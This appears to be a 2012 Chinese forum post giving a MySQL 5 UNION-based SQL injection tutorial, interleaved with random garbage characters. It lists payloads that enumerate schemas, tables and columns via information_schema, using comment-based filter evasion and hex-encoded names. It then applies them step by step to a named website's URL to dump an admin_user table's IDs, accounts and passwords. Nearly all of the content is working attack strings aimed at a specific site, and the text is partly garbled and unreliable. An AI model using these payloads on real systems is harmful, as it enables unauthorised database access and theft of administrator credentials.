查库$ m. c$ {1 u2 }6 w
# w& L! b: J* R5 O
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*, A0 G# s. F8 @5 x) H8 r, N2 R3 C
& F k. d- b; h( H查表+ b3 K/ |# G8 j
! N) `# K6 r6 U9 S% E
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,12 M8 k1 i0 |# A! u( s' e
" S; q. K2 a2 l: t* S
查段
2 `, D2 E& f# A2 R! t7 M$ B1 Z
$ ~8 l( W/ j& I1 Did=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,15 Y9 l+ T0 p! ^8 X1 f. w
0 }+ u/ B2 U! V' z5 y
* b5 v8 ]( |- n; u3 ~) Qmysql5高级注入方法暴表6 i5 d! Q3 V2 `& s8 r
- O% _3 j" t" l+ [/ R
例子如下:/ P6 ?: e" D; j" ~+ s
4 x8 v' I9 J7 L; F1.爆表
6 h( w) Y( H3 ^& ]) Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet), @& ?5 Q$ ]3 W+ z3 G0 ?
这样爆到第4个时出现了admin_user表。6 K6 m9 l C+ E" D
5 e7 H' f/ s2 C, f+ b" b
2.暴字段. f4 W5 ?* c7 w% E- o* N
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
& c/ d5 T5 Q( G6 _- e2 \ e; B/ }; K) A, m' j" {& D
5 y: g9 P' h( U% M9 [/ ]: W7 }( L3.爆密码! O( \& ~2 ?: ~- B. A* j
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
9 [$ Z: o4 `) m6 q
8 w/ h- d6 l) p! V, g0 k9 l6 X* A+ t% p4 @5 P2 b F% U) |# }
|
发表于 2012-9-13 16:29:37
收藏
支持
反对